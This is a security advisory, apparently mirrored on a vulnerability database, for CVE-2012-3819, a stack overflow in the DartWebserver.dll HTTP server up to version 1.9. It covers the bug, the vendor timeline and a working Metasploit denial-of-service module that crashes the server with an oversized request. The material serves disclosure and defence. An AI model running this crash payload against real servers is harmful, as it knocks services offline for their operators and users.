Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28596
HistoryOct 04, 2012 - 12:00 a.m.

CVE-2012-3819: Stack Overflow in DartWebserver.dll <= 1.9

2012-10-0400:00:00
vulners.com
18
JSON

Overview

DartWebserver.Dll is an HTTP server provided by Dart Comunications
(dart.com). It is distributed intheir PowerTCP/Webserver For ActiveX
product and likely other similar products.

"Build web applications in any familiar software development
environment. Use WebServer for ActiveX to add web-based access to
traditional compiled applications."

Version 1.9 and prior is vulnerable to a stack overflow exception,
these maybe generated by producing large requests to the application,
e.g. "a" * 5200000 + "\n\n"

Analysis

During the processing of incoming HTTP requests the server collects
data until it encounters a "\n\n" sentinel. If the request is large,
multiple copies are made and stored on the stack, this consumes the
amount of stack space available to the process quickly, leading to a
stack overflow exception being thrown. This exception is not handled
and will typically lead to the termination of the parent process. Some
variations may exist per system depending on pre-existing memory
conditions and modification of Proof Of Concept (PoC) code may be
necessary to reproduce the exception.

Timeline

10/20/2011 - Discovered the bug in an affected vendor application
10/20/2011 - Contacted affected vendor
10/21/2011 - Affected vendor replies stating they can not get the
product vendor to create a fix
06/29/2012 - CVE assignment
08/08/2012 - Contacted product vendor providing specifics
08/20/2012 - Product vendor created an issue number (#5654) for the
bug, but reply "there are not immediate plans to resolve the issue"
09/28/2012 - Posting to bugtraq, for the first time ever

PoC (MSF Module)

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos

def initialize(info = {})
super(update_info(info,
'Description' => %q{ 'Name' => 'Dart Webserver
<= 1.9.0 Stack Overflow',
Dart Webserver from Dart Communications throws a stack
overflow exception
when processing large requests.
}
,
'Author' => [
'catatonicprime'
],
'Version' => '$Revision: 15513 $',
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2012-3819' ],
],
'DisclosureDate' => '9/28/2012'))

register_options&#40;[
    Opt::RPORT&#40;80&#41;,
    OptInt.new&#40;&#39;SIZE&#39;, [ true, &#39;Estimated stack size to exhaust&#39;,

'520000' ])
])
end
def run
serverIP = datastore['RHOST']
if (datastore['RPORT'].to_i != 80)
serverIP += ":" + datastore['RPORT'].to_s
end
size = datastore['SIZE']

    print_status&#40;&quot;Crashing the server ...&quot;&#41;
    request = &quot;A&quot; * size + &quot;&#92;r&#92;n&#92;r&#92;n&quot;
    connect
    sock.put&#40;request&#41;
    disconnect

end

end

JSON